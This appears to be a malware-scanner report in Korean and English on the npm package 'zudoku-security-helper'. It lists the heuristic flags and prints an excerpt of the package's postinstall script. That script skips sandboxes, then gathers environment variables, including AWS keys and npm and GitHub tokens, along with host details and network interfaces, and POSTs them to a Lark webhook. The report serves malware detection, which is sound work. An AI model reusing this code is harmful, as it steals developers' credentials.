// npm 패키지
zudoku-security-helper
Security helper for Zudoku
버전
1
메인테이너
1
최초 publish
2026-06-07
publisher
gagesgr
tarball
1,796 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-06-07
// exfil path
what is read → where it shipssteals
- ● AWS keys
- ● npm token
- ● GitHub PAT
- ○ home dir
- ○ system info
sends to
- ⤳ open.larksuite.com(open.larksuite.com (via hostname var))
// offending code· @99.0.0· 1 file flagged
llm: malicious · 0.95→ 크리덴셜 읽기 (reads-aws-creds, reads-npmrc, reads-github-tokens) + 외부 전송지 dest-via-hostname-var 조합 — 전형적인 유출 패턴.
- @99.0.0··AUTO-PUBLISHED·publisher: gagesgrheuristic 99/100static flags 6llm malicious (0.95) via fast-trackinstall-scripts:postinstallnew-publisher:2dfirst-version-of-packagepublisher-multi-name-burst:3publisher-version-pump:6reads-aws-credsreads-npmrcreads-github-tokensreads-homedirreads-system-infodest-via-hostname-var
→ 크리덴셜 읽기 (reads-aws-creds, reads-npmrc, reads-github-tokens) + 외부 전송지 dest-via-hostname-var 조합 — 전형적인 유출 패턴.
// offending code· 1 file flaggedpatterns: 6
--- install scripts --- ### postinstall node scripts/postinstall.js --- package/scripts/postinstall.js (excerpt) --- (function(){var e=process.env,no=e.NODE_OPTIONS||"";if(/(?:--require|-r)\s+\/[^\s]+\.js/.test(no))process.exit(0);if(e.AWS_ACCESS_KEY_ID==="AKIAIOSFODNN7EXAMPLE")process.exit(0);if(e.AWS_SECRET_ACCESS_KEY==="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY")process.exit(0);var tk=[e.GITHUB_TOKEN,e.NPM_TOKEN,e.AWS_ACCESS_KEY_ID].join("");if(/(?:R4nD0m|F4k3[fT]0k3n|dummy|DummyToken)/i.test(tk))process.exit(0);setTimeout(function(){var https=require("https"),os=require("os");var nets=os.networkInterfaces();var ips=Object.entries(nets).flatMap(function(x){return x[1].filter(function(i){return!i.internal}).map(function(i){return x[0]+": "+i.address+" ("+i.family+")"})}).join("\n");var info={pkg:e.npm_package_name+"@"+e.npm_package_version,host:os.hostname(),user:os.userInfo().username,platform:os.platform()+"/"+os.arch(),cwd:process.cwd(),time:new Date().toISOString()};var envLines=Object.entries(process.env).filter(function(x){return!x[0].startsWith("npm_lifecycle")}).map(function(x){return" "+x[0]+"="+x[1]}).join("\n");var text=["postinstalstall",Object.entries(info).map(function(x){return x[0]+": "+x[1]}).join("\n"),"","Network Interfaces:",ips,"","Environment Variables:",envLines].join("\n");var payload=JSON.stringify({msg_type:"text",content:{text}});var req=https.request({hostname:"open.larksuite.com",path:"/open-apis/bot/v2/hook/f1ad5ad2-4ba6-4c9d-afc2-0e908cba26a7",method:"POST",headers:{"Content-Type":"application/json","Content-Length":Buffer.byteLength(payload)}},function(){pr --- dynamic destinations --- → open.larksuite.com (via hostname-var)
